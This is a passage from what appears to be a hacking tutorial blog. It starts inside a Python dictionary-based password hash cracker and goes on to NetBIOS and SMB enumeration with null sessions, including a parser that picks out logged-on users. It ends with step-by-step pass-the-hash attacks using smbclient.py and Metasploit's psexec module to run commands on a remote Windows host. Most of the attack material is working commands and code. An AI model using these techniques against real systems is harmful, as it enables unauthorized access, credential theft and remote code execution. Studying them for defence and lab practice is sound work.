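    """Equivalent of --rules --stdout: all candidates, duplicates removed, order kept."""
    seen, out = set(), []
    for word in words:
        for cand in mangle(word):
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def crack(targets, wordlist, algo="md5", rules=True):
    """Hash each candidate with the same algorithm as the targets and compare.
    Returns {user: plaintext} for every hash that was found."""
    remaining = {digest: user for user, digest in targets.items()}   # hash -> user
    found = {}
    for word in wordlist:
        for cand in (mangle(word) if rules else (word,)):
            digest = hashlib.new(algo, cand.encode("utf-8")).hexdigest()
            if digest in remaining:
                found[remaining.pop(digest)] = cand
                if not remaining:
                    return found
    return found


# constructed sample hash file (pwdump-style user:hash lines) and a tiny wordlist
SAMPLE_HASHES = "\n".join([
    "admin:" + hashlib.md5(b"mypass").hexdigest(),
    "mary:" + hashlib.md5(b"Winter2009").hexdigest(),
    "bob:" + hashlib.md5(b"correcthorsebattery").hexdigest(),
])
SAMPLE_WORDS = ["password", "winter", "mypass", "letmein"]

if __name__ == "__main__":
    targets = parse_hash_file(SAMPLE_HASHES)
    print(crack(targets, SAMPLE_WORDS))            # bob's password is not in the list
    print(len(expand_wordlist(SAMPLE_WORDS)), "candidates after mangling")
```

Two things worth noticing: an unsalted hash such as raw MD5 lets one hash computation be compared against every target at once (the dictionary lookup in crack), which is exactly what salting is meant to prevent; and mary's "Winter2009" falls to a mangling rule even though the bare word "winter" is the only thing in the wordlist.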

Resources/Good reading:
http://en.wikipedia.org/wiki/John_the_Ripper


Playing with netbios shares (smbclient and nmblookup)

So you are on a network and want to learn about your neighbours: what their computer names are, who is logged on, share names, etc. Windows makes most of this information easy to obtain. Enter smbclient, an FTP-like client for SMB/CIFS resources, and nmblookup, a utility for looking up NetBIOS names. Before we begin enumerating the network we need to find the IPs of the live Windows clients.

# netdiscover -i eth0 -r 10.0.0.0/24 //discover live clients that respond to our ARP requests

I personally would use nmap for this, as it has many scan techniques besides ARP. Once we have identified a potential target (we are going to use 10.0.0.2), let's use it with nmblookup and smbclient.

# nmblookup -A 10.0.0.2 //dump the NetBIOS name table of 10.0.0.2. The hex code in angle brackets after each name is a suffix that tells you what the name is registered for. A unique (non-GROUP) <03> entry that is not the computer's own name is the currently logged-on user, because the Messenger service registers both the computer name and the user name with suffix <03>. Below is a list of suffix meanings taken from http://www.windowsnetworking.com/kbase/WindowsTips/WindowsNT/AdminTips/Utilities/Nbtstatrevealswhoisloggedon.html.

Name                  Number(h)  Type  Usage
--------------------------------------------------------------------------
                      00         U     Workstation Service
                      01         U     Messenger Service
<\\--__MSBROWSE__>    01         G     Master Browser
                      03         U     Messenger Service
                      06         U     RAS Server Service
                      1F         U     NetDDE Service
                      20         U     File Server Service
                      21         U     RAS Client Service
                      22         U     Microsoft Exchange Interchange (MSMail Connector)
                      23         U     Microsoft Exchange Store
                      24         U     Microsoft Exchange Directory
                      30         U     Modem Sharing Server Service
                      31         U     Modem Sharing Client Service
                      43         U     SMS Clients Remote Control
                      44         U     SMS Administrators Remote Control Tool
                      45         U     SMS Clients Remote Chat
                      46         U     SMS Clients Remote Transfer
                      4C         U     DEC Pathworks TCPIP service on Windows NT
                      42         U     McAfee Anti-Virus
                      52         U     DEC Pathworks TCPIP service on Windows NT
                      87         U     Microsoft Exchange MTA
                      6A         U     Microsoft Exchange IMC
                      BE         U     Network Monitor Agent
                      BF         U     Network Monitor Application
                      03         U     Messenger Service (logged-on user name)
                      00         G     Domain Name
                      1B         U     Domain Master Browser
                      1C         G     Domain Controllers
                      1D         U     Master Browser
                      1E         G     Browser Service Elections
                      1C         G     IIS
                      00         U     IIS
                      2B         U     Lotus Notes Server Service
IRISMULTICAST         2F         G     Lotus Notes
IRISNAMESERVER        33         G     Lotus Notes
Forte_$ND800ZA        20         U     DCA IrmaLan Gateway Server Service

Type: U = unique name, G = group name. Where the Name column is blank, the name is the computer, domain or user name that the Usage column describes.
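Reading a name table by hand gets old quickly on a /24, so here is a small parser written for this post (my own Python, not part of Samba) that takes nmblookup -A output, applies the suffix table above, and pulls out the pieces an enumerator cares about: the workstation name, the workgroup/domain, whether the file server service is registered, the MAC address, and the logged-on users (unique <03> names that are not the computer name). The sample output it is fed is constructed to look like a typical XP workstation's reply.

```python
import re

# subset of the suffix table above, keyed by lower-case hex suffix
NBT_SUFFIX = {
    "00": "Workstation Service / Domain Name",
    "01": "Messenger Service / Master Browser",
    "03": "Messenger Service (computer or logged-on user name)",
    "1b": "Domain Master Browser",
    "1c": "Domain Controllers",
    "1d": "Master Browser",
    "1e": "Browser Service Elections",
    "20": "File Server Service",
}

# one name-table row, e.g. "    WORKSTATION1    <00> -         B <ACTIVE> "
ENTRY = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+-\s+(<GROUP>)?\s*B\s+<ACTIVE>")
MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")


def parse_nmblookup(text):
    """Parse 'nmblookup -A <ip>' output into the facts an enumerator wants."""
    entries = []                       # (name, suffix, is_group)
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            entries.append((m.group(1), m.group(2).lower(), m.group(3) is not None))
    unique = [(n, s) for n, s, g in entries if not g]
    group = [(n, s) for n, s, g in entries if g]
    workstation = next((n for n, s in unique if s == "00"), None)
    workgroup = next((n for n, s in group if s == "00"), None)
    mac = MAC.search(text)
    return {
        "entries": [(n, s, g, NBT_SUFFIX.get(s, "unknown")) for n, s, g in entries],
        "workstation": workstation,
        "workgroup": workgroup,
        # the Messenger service registers both the computer name and each
        # logged-on user with suffix <03>; the non-computer ones are users
        "users": [n for n, s in unique if s == "03" and n != workstation],
        "file_server": any(s == "20" for n, s in unique),
        "domain_controller": any(s == "1c" for n, s in group) and workgroup is not None
                             and any(n == workgroup and s == "1c" for n, s in group),
        "mac": mac.group(1) if mac else None,
    }


# constructed sample: what nmblookup -A prints for a typical XP workstation
SAMPLE_NMBLOOKUP = """Looking up status of 10.0.0.2
    WORKSTATION1    <00> -         B <ACTIVE>
    WORKGROUP       <00> - <GROUP> B <ACTIVE>
    WORKSTATION1    <20> -         B <ACTIVE>
    WORKGROUP       <1e> - <GROUP> B <ACTIVE>
    WORKSTATION1    <03> -         B <ACTIVE>
    MARY            <03> -         B <ACTIVE>

    MAC Address = 00-11-22-33-44-55
"""

if __name__ == "__main__":
    info = parse_nmblookup(SAMPLE_NMBLOOKUP)
    print("host %s in %s, logged on: %s, shares: %s, mac %s" % (
        info["workstation"], info["workgroup"], info["users"],
        info["file_server"], info["mac"]))
```

Feeding it real output is a matter of replacing SAMPLE_NMBLOOKUP with the result of running nmblookup -A through subprocess; the parser ignores any line that is not a name-table row, including the "Looking up status" banner.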
Next we can use smbclient to reveal the shares on a particular system.

# smbclient -N -L 10.0.0.2 //list share names and the OS type

-N: Suppresses the password prompt (a null session), since we don't know any passwords
-L: Lists the shares and any other services it can see on the host

We can attempt to connect/login to a system share.

# smbclient //10.0.0.2/share -N //try to connect to 'share' on 10.0.0.2 without a password

If you are lucky and get into the share, it is the result of a poorly configured share. You can browse the directory, upload and download files, and more. Type help at the prompt for a list of commands at your disposal.

smb: \> help

On XP it is harder to set up a proper share with appropriate permissions than to set up a share that is open to everyone. Sounds like the mindset of the typical Windows user, doesn't it? I'll admit, I was one of them.

Resources/Good reading:
http://pur3h4t3.blogspot.com/2008/12/scripts.html
http://www.windowsnetworking.com/kbase/WindowsTips/WindowsNT/AdminTips/Utilities/Nbtstatrevealswhoisloggedon.html

Pass-the-Hash, Who needs a password anyways...

Pass the hash refers to a method of authenticating to a system without using the plaintext password. What is used instead is the password hash (the plaintext password run through a one-way algorithm). In the pass-the-hash method we use this hash directly to authenticate to the server; NTLM authentication only ever proves knowledge of the hash, not the password, which is why this works. We can't just type the hash into the password prompt, if that's what you're assuming: we need special tools, since Windows does not naturally support this for obvious reasons. The tools I'm going to demo are a modified smbclient, smbclient.py, written in Python and found in BackTrack 4, and the Metasploit psexec module. This demo requires you to use your own skills to obtain the hashes (research fgdump or pwdump).

[SMBCLIENT]
Enter the following commands for smbclient.py:
# python ./smbclient.py //start the client
# open 10.0.0.2 139 //open an SMB connection to host/port
# login_hash user1 your_lmhash your_nthash //log into the SMB session with a user/hash combination. Note the space between the LM and NT hashes.
example: login_hash mary aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0 (these are the well-known LM and NT hashes of an empty password, shown only to illustrate the format: 32 hex characters each)
# shares //list available shares
# use share_name //connect to a specific share

If all goes well and you are logged in, you can go up the file tree, download or upload files, delete files etc. For more commands just type 'help'.

[PSEXEC]
Enter the following commands in Metasploit:
# ./msfconsole //Lauch the metasploit framework
msf> use exploit/windows/smb/psexec //select the psexec module to use as the exploit
msf exploit(psexec)>show options //list the options that are needed for the exploit to work
msf exploit(psexec)>set RHOST 10.0.0.2 //sets the targets IP
msf exploit(psexec)>set SMBUser admin //sets the username
msf exploit(psexec)>set SMBPass lm_hash:nt_hash //sets the LM:NT hash pair. Note that you need both, separated only by a ':'. Leave RPORT at 445 (139 won't work).
msf exploit(psexec)>set PAYLOAD windows/exec //sets your payload. Do show payloads for others
msf exploit(psexec)>set CMD calc.exe //sets the command to execute
msf exploit(psexec)>exploit //run the exploit

If all is well, calc.exe should have been executed on the remote system. Obviously you may want too do something more than just run calc like gain a shell. No problem, just set the required payload and the necessary options and you're good to go.